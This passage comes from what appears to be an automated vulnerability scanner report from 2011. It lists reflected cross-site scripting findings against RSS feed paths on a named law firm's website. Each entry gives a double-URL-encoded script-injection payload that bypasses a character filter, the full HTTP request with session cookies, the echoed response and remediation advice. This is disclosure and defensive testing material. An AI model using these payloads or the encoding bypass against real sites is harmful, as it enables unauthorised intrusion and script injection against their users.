<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_newscc00e"><script>alert(1)</script>d760b3b5dd4/rss.xml" value="">
...[SNIP]...

4.216. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f was submitted in the REST URL parameter 3. This input was echoed as b6f54"><script>alert(1)</script>2151516518f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/in_the_news/rss.xmlb6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_news/rss.xmlb6f54"><script>alert(1)</script>2151516518f" value="">
...[SNIP]...

4.217. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9 was submitted in the REST URL parameter 1. This input was echoed as 9abb7"><script>alert(1)</script>3d2f01cf3f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9/news_releases/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss9abb7"><script>alert(1)</script>3d2f01cf3f9/news_releases/rss.xml" value="">
...[SNIP]...

4.218. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5 was submitted in the REST URL parameter 2. This input was echoed as dc1d0"><script>alert(1)</script>98c2f7af3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releasesdc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releasesdc1d0"><script>alert(1)</script>98c2f7af3b5/rss.xml" value="">
...[SNIP]...

4.219. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 was submitted in the REST URL parameter 3. This input was echoed as ee81a"><script>alert(1)</script>d27cf73a803 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releases/rss.xmlee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releases/rss.xmlee81a"><script>alert(1)</script>d27cf73a803" value="">
...[SNIP]...

4.220. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9 was submitted in the REST URL parameter 1. This input was echoed as 32ca8"><script>alert(1)</script>73f8dfaacf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9/practices/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss32ca8"><script>alert(1)</script>73f8dfaacf9/practices/Advertising/rss.xml" value="">
...[SNIP]...

4.221. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices5de32"><script>alert(1)</script>bc55ccc6862/Advertising/rss.xml" value="">
...[SNIP]...

4.222. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Advertising80e2b"><script>alert(1)</script>09ca10697f5/rss.xml" value="">
...[SNIP]...

4.223. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS atta